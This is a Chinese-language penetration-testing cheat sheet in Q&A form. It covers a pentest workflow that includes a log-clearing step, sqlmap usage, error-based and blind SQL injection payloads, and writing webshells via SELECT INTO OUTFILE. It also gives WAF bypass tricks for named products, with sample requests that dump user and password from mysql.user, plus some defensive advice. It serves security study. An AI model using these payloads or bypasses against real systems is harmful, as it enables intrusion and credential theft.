以下內容出自i春秋社區

在獲取書面授權的前提下。

1)信息收集，

1，獲取域名的whois信息,獲取注冊者郵箱姓名電話等。

2，查詢服務器旁站以及子域名站點，因為主站一般比較難，所以先看看旁站有沒有通用性的cms或者其他漏洞。

3，查看服務器操作系統版本，web中間件，看看是否存在已知的漏洞，比如IIS，APACHE,NGINX的解析漏洞

4，查看IP，進行IP地址端口掃描，對響應的端口進行漏洞探測，比如 rsync,心臟出血，mysql,ftp,ssh弱口令等。

5，掃描網站目錄結構，看看是否可以遍歷目錄，或者敏感文件泄漏，比如php探針

6，google hack 進一步探測網站的信息，后臺，敏感文件

2）漏洞掃描

開始檢測漏洞，如XSS,XSRF,sql注入，代碼執行，命令執行，越權訪問，目錄讀取，任意文件讀取，下載，文件包含，

遠程命令執行，弱口令，上傳，編輯器漏洞，暴力破解等

3）漏洞利用

利用以上的方式拿到webshell，或者其他權限

4）權限提升

提權服務器，比如windows下mysql的udf提權，serv-u提權，windows低版本的漏洞，如iis6,pr,巴西烤肉，

linux藏牛漏洞，linux內核版本漏洞提權，linux下的mysql system提權以及oracle低權限提權

5) 日志清理

6）總結報告及修復方案

sqlmap，怎么對一個注入點注入？

1）如果是get型號，直接，sqlmap -u "諸如點網址".

2) 如果是post型諸如點，可以sqlmap -u "注入點網址” --data="post的參數"

3）如果是cookie，X-Forwarded-For等，可以訪問的時候，用burpsuite抓包，注入處用*號替換，放到文件里，然后sqlmap -r "文件地址"

nmap，掃描的幾種方式

sql注入的幾種類型？

1）報錯注入

2）bool型注入

3）延時注入

4）寬字節注入

報錯注入的函數有哪些？

1）and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】----------------

2）通過floor報錯 向下取整

3）+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)

4）.geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5）.multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6）.polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7）.multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8）.linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9）.multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10）.exp()select * from test where id=1 and exp(~(select * from(select user())a));

延時注入如何來判斷？

if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

盲注和延時注入的共同點？

都是一個字符一個字符的判斷

如何拿一個網站的webshell？

上傳，后臺編輯模板，sql注入寫文件，命令執行，代碼執行，

一些已經爆出的cms漏洞，比如dedecms后臺可以直接建立腳本文件，wordpress上傳插件包含腳本文件zip壓縮包等

sql注入寫文件都有哪些函數？

select '一句話' into outfile '路徑'

select '一句話' into dumpfile '路徑'

select '' into dumpfile 'd:\\wwwroot\http://baidu.com\nvhack.php';

如何防止CSRF?

1,驗證referer

2，驗證token

詳細：淺談cnode社區如何防止csrf攻擊 - CNode技術社區

owasp 漏洞都有哪些？

1、SQL注入防護方法：

2、失效的身份認證和會話管理

3、跨站腳本攻擊XSS

4、直接引用不安全的對象

5、安全配置錯誤

6、敏感信息泄露

7、缺少功能級的訪問控制

8、跨站請求偽造CSRF

9、使用含有已知漏洞的組件

10、未驗證的重定向和轉發

SQL注入防護方法？

1、使用安全的API

2、對輸入的特殊字符進行Escape轉義處理

3、使用白名單來規范化輸入驗證方法

4、對客戶端輸入進行控制，不允許輸入SQL注入相關的特殊字符

5、服務器端在提交數據庫進行SQL查詢之前，對特殊字符進行過濾、轉義、替換、刪除。

代碼執行，文件讀取，命令執行的函數都有哪些？

1，代碼執行：eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function

2，文件讀取：file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

3，命令執行：system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

img標簽除了onerror屬性外，還有其他獲取管理員路徑的辦法嗎？

src指定一個遠程的腳本文件，獲取referer

img標簽除了onerror屬性外，并且src屬性的后綴名，必須以.jpg結尾，怎么獲取管理員路徑。

1,遠程服務器修改apache配置文件，配置.jpg文件以php方式來解析

AddType application/x-httpd-php .jpg

會以php方式來解析

代碼審計

eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function

文件讀取：file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

命令執行：system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

繞過walf

1、關鍵字可以用%（只限IIS系列）。比如select，可以sel%e%ct。原理：網絡層waf對SEL%E%CT進行url解碼后變成SEL%E%CT，匹配select失敗，而進入asp.dll對SEL%E%CT進行url解碼卻變成select。IIS下的asp.dll文件在對asp文件后參數串進行url解碼時，會直接過濾掉09-0d（09是tab鍵,0d是回車）、20（空格）、%(后兩個字符有一個不是十六進制)字符。xss也是同理。

2、通殺的，內聯注釋。安全狗不攔截，但是安全寶、加速樂、D盾等，看到/*!/就Fack了，所以只限于安全狗。比如：/*!select*/

3、編碼。這個方法對waf很有效果，因為一般waf會解碼，但是我們利用這個特點，進行兩次編碼，他解了第一次但不會解第二次，就bypass了。騰訊waf、百度waf等等都可以這樣bypass的。

4，繞過策略一：偽造搜索引擎

早些版本的安全狗是有這個漏洞的，就是把User-Agent修改為搜索引擎

5，360webscan腳本存在這個問題，就是判斷是否為admin dede install等目錄，如果是則不做攔截

1. GET /pen/news.php?id=1 union select user,password from mysql.user

1. GET /pen/news.php/admin?id=1 union select user,password from mysql.user

1. GET /pen/admin/..\news.php?id=1 union select user,password from mysql.user

6，multipart請求繞過，在POST請求中添加一個上傳文件，繞過了絕大多數WAF。

7，參數繞過，復制參數，id=1&id=1

用一些特殊字符代替空格，比如在mysql中%0a是換行，可以代替空格，這個方法也可以部分繞過最新版本的安全狗，在sqlserver中可以用/**/代替空格

8,內聯注釋，

文件上傳，復制文件包一份再加一份

在 form-data;后面增加一定的字符

寬字符注入

寬字符：解 決方法：就是在初始化連接和字符集之后，使用SET character_set_client=binary來設定客戶端的字符集是二進制的。修改Windows下的MySQL配置文件一般是 my.ini，Linux下的MySQL配置文件一般是my.cnf，比如：mysql_query("SETcharacter_set_client=binary");。character_set_client指定的是SQL語句的編碼，如果設置為 binary，MySQL就以二進制來執行，這樣寬字節編碼問題就沒有用武之地了。